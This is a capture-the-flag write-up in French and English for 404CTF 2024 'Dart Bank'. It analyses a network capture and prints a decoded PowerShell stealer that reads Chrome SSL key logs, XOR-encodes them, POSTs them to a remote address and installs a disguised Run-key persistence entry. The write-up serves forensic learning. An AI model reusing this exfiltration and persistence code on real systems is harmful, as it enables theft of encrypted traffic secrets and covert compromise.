404CTF2024 - Dart Bank
Attention : ce challenge contient du code Ă portĂ©e malveillante. Bien que l’auteur se soit efforcĂ© de le rendre relativement inoffensif, il convient de prendre les mesures d’isolation adĂ©quates s’il devait ĂȘtre exĂ©cutĂ©. L’organisation dĂ©cline toute responsabilitĂ© en cas de dommages Ă votre systĂšme.
Je me dirigeais vers l’Ă©preuve de lancer de flĂ©chettes quand j’ai fait une dĂ©couverte horrifiante : on m’a dĂ©robĂ© ma flĂ©chette porte-bonheur ! Pourtant, cette derniĂšre Ă©tait bien sĂ©curisĂ©e grĂące Ă ma banque Ă flĂ©chettes, DartsBank, et cette derniĂšre a toutes les protections qui s’imposent… MĂȘme le petit cadenas vert ! Je crois avoir remarquĂ© des choses Ă©tranges sur le rĂ©seau, vous pouvez y jeter un Ćil ?
Investiguez la capture réseau fournie et retrouvez le flag qui est au format habituel: 404CTF{...}
We are using Wireshark to open the dart.pcapng
Capture Properties :
We can see some DNS, many TLS packets and some HTTP

A strange DNS query, let’s check :
But we also have this one :
But it dosen’t help us
Let’s check the HTTP Objects :

Let’s save them all and check their content
One of them seems to be a powershell encoded command, let’s check
foreach($bbbbbbbbbbbb in Get-ChildItem -Recurse -Path C:\Users -ErrorAction SilentlyContinue -Include *.lnk){$bbbbbbbbbbbbbbb=New-Object -COM WScript.Shell;
if($bbbbbbbbbbbbbbbb.TargetPath -match 'chrome\.exe$'){
$aaaaaaaaaaaa=[byte[]](215,194,241,104,227,144,14,174,114,200,246,47,173,23,167,210,32,183,43,187,204,108,49,109,86,251,4,14,73,37,73,168,230,22,94,148................] <REDACTED>
while($true){$aaaaaaaaaaaaaaa=Get-Item -Path $aaaaaaaaaaaaaa;
if($aaaaaaaaaaaaaaaa -gt $aaaaaaaaaaaaa){
$aaa=[System.IO.File]::Open($aaaaaaaaaaaaaa,[System.IO.FileMode]::Open, [System.IO.FileAccess]::Read,[System.IO.FileShare]::ReadWrite);$aaa.Seek($aaaaaaaaaaaaa,[System.IO.SeekOrigin]::Begin)|Out-Null;$aaaaaaaaaaaaaaaaaaa=New-Object byte[] ($aaaaaaaaaaaaaaaa - $aaaaaaaaaaaaa);$aaa.read($aaaaaaaaaaaaaaaaaaa,0,$aaaaaaaaaaaaaaaa - $aaaaaaaaaaaaa)|Out-Null;for($i=0;$i -lt $aaaaaaaaaaaaaaaaaaa.count;$i++){$aaaaaaaaaaaaaaaaaaa[$i]=$aaaaaaaaaaaaaaaaaaa[$i] -bxor $aaaaaaaaaaaa[$i % $aaaaaaaaaaaa.count];}$data=[Convert]::ToBase64String($aaaaaaaaaaaaaaaaaaa);Invoke-WebRequest -Uri -Method POST -Body $data|Out-Null;$aaa.Close()|Out-Null;}$aaaaaaaaaaaaa=$aaaaaaaaaaaaaaaa;Start-Sleep -Seconds 5;}
Start-Process -WindowStyle Maximized https://hello.smyler.net
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc))>$env:TEMP\run.ps1;New-ItemProperty -Path Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run -Name ChromeUpdateChecker -Value "powershell -ep Bypass -File $env:TEMP\run.ps1" -PropertyType String -Force;powershell -ep Bypass -File $env:TEMP\run.ps1;
As we can see, the 5th line allows to log the ssl-key-log-file
to the $env:TEMP\defender-res.txt
file. This file logs the SSL session key during HTTPS exchanges. The SSL session key is XORed with the $aaaaaaaaaaaa
array and base64 on the result and sent in POST request to
Now we know that the next file that we opened in VScode earlier are the SSL session key and we can decode them. See this script : [[decode.py]]

From now, we can see HTTP2 streams, it means we decoded the TLS/SSL streams using the keys !

We can extract them in JSON in order to grep
on it

The flag is 404CTF{En_pl31n_d4ns_l3_1337_v1@_sUp3r_TLS_d3crypt0r}